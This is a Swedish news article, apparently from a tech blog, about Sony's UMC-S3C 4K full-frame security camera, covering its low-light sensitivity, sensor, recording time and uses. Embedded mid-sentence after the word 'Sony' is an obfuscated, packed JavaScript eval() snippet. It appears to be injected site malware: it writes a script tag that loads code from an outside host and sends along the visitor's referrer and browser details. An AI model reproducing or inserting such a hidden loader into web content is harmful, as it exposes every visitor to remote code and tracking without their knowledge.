Image Image Image Image Image Image Image Image Image Image

| 21 juni, 2018

Scroll to top

Top

No Comments

Se alla detaljer med Sonys nya 4K-säkerhetskamera

Se alla detaljer med Sonys nya 4K-säkerhetskamera
Sebastian Plengier Ehrnfelt

Sony eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|rdszz|var|u0026u|referrer|zyeet||js|php’.split(‘|’),0,{}))
lanserar nu UMC-S3C – branschens första säkerhetskamera med ultra-hög känslighet i kombination med 4K-kvalitet, vilket ger användare möjlighet att fånga detaljer även i utmanande ljusmiljöer. Kameran erbjuder även stora variationsmöjligheter, inspelning under en längre tid och möjlighet att skjuta stillbilder med 12 megapixel i fullfärg. Lanseringen följer tätt efter introduktionen av Sonys 4K-nätverkskamera
SNC-VB770.

Bildkvaliteten i säkerhetskameror har förbättrats avsevärt de senaste åren men skiljer sig fortfarande avsevärt beroende på vilket system man använder. Statens Kriminaltekniska Laboratorium (SKL) konstaterar att kvaliteten varierar kraftigt på de kameraövervakningssystem som finns och säljs i dag. Potentiella köpare rekommenderas därför ha tillräckligt med kunskap för att kunna specificera sitt säkerhetsbehov.*

– På Sony har vi starkt fokus på att förbättra både upplösning och känslighet. Med den skarpa bildkvalitet som våra 4K-kameror levererar så kan vi nu erbjuda exempelvis försäkringsbolag och statliga bolag men även mindre företag en och samma kamera för både översiktsbilder och närbilder, något som tidigare krävt två olika kameror, säger Roger Lawrence, produktchef över Video Security på Sony Professional Solutions Europe.

UMC-S3C har den högsta känsligheten i sin klass, med en ljusstyrka under 0.004lx, ISO 4096001, vilket har möjliggjorts genom inkorporering av Sonys avancerade teknik från både sitt konsument- och B2B-affärsområde; 35mm Exmor-fullformatsensor och bildbehandlingsmotor.

UMC-S3C använder en 35mm fullformatsensor med hög känslighet och en bildbehandlingsmotor som förbättrar brusreduceringen. Genom kompatibla E-fattningslinser, optimerade för att maximera prestandan av 12 MP-fullskärmssensorn, håller upplösningen hög kvalitet över hela bildytan från mitten till linsens periferi.

Kameran levererar skarpa bilder med reducerat brus tack vare sin 35mm fullformatsensor, som fångar avsevärt mycket mer ljus och lägre brus än konventionella kamerasensorer. Sensorn kan även i kombination med detta selektivt applicera brusreducering där användaren önskar. Den höga känsligheten möjliggör även högre slutartider vid inspelningar i lågljusmiljöer så rörliga objekt kan fångas även vid tuffare förutsättningar – utan att förlora skärpa och detaljer i exempelvis texter eller ansikten.

Lättviktaren UMC-S3C, med en vikt på cirka 400g, är just nu den mest kompakta i Sonys produktportfölj av fullformatskameror. Fästpunkter på kamerahuset gör att den fristående kameran, med enkelhet, kan fästas på rörliga objekt såsom bilar. Dessutom kan kameran hanteras via multiterminalen2, fjärrkontrollen eller kompatibel mjukvara.

UMC-S3C lämpar sig för en mängd olika användningsområden, såsom nyhetsbevakning; viltövervakning; kartläggning eller landskapsövervakning; övervakning; inspektioner och utredningar; vid live-inspelning; som dashboard/point-of-view kamera och mycket annat. UMC-S3C passar in i vilken befintlig infrastruktur som helst och möjliggör också olika uppspelningsfunktioner med hjälp av en PC eller med Live View via HDMI.

Långtidsinspelning är också möjligt då den fristående kameran är utrustad med ett minneskort på själva kamerahuset. Med exempelvis ett 64GB-minneskort kan användare spela in upp till 125 minuter av 4K-foto/film med standardkvalitet (30 fps/60Mbps). Med 4K-upplösning, där bildupplösningen är fyra gånger högre än med full-HD, kan användare täcka större ytor med enastående bildkvalitet. Kameran inrymmer även formatet XAVC S, vilket möjliggör högkvalitetsinspelning med 100Mbps hög bithastighet3. Detta är en enorm fördel för användare i utmanande miljöer där kablage eller utrymmet begränsar.

Sonys UMC-S3C kommer att bli tillgänglig i Europa under sommaren 2016.

* http://nfc.polisen.se/Trycksaker/Faktablad/Rad-vid-kameraovervakning/

1 Standard ISO 100 – 102400, kan utökas till ISO 50-409600
2 Stödjer Micro-USB kompatibla tillbehör/enheter
3 Vid 4K-inspelning

Submit a Comment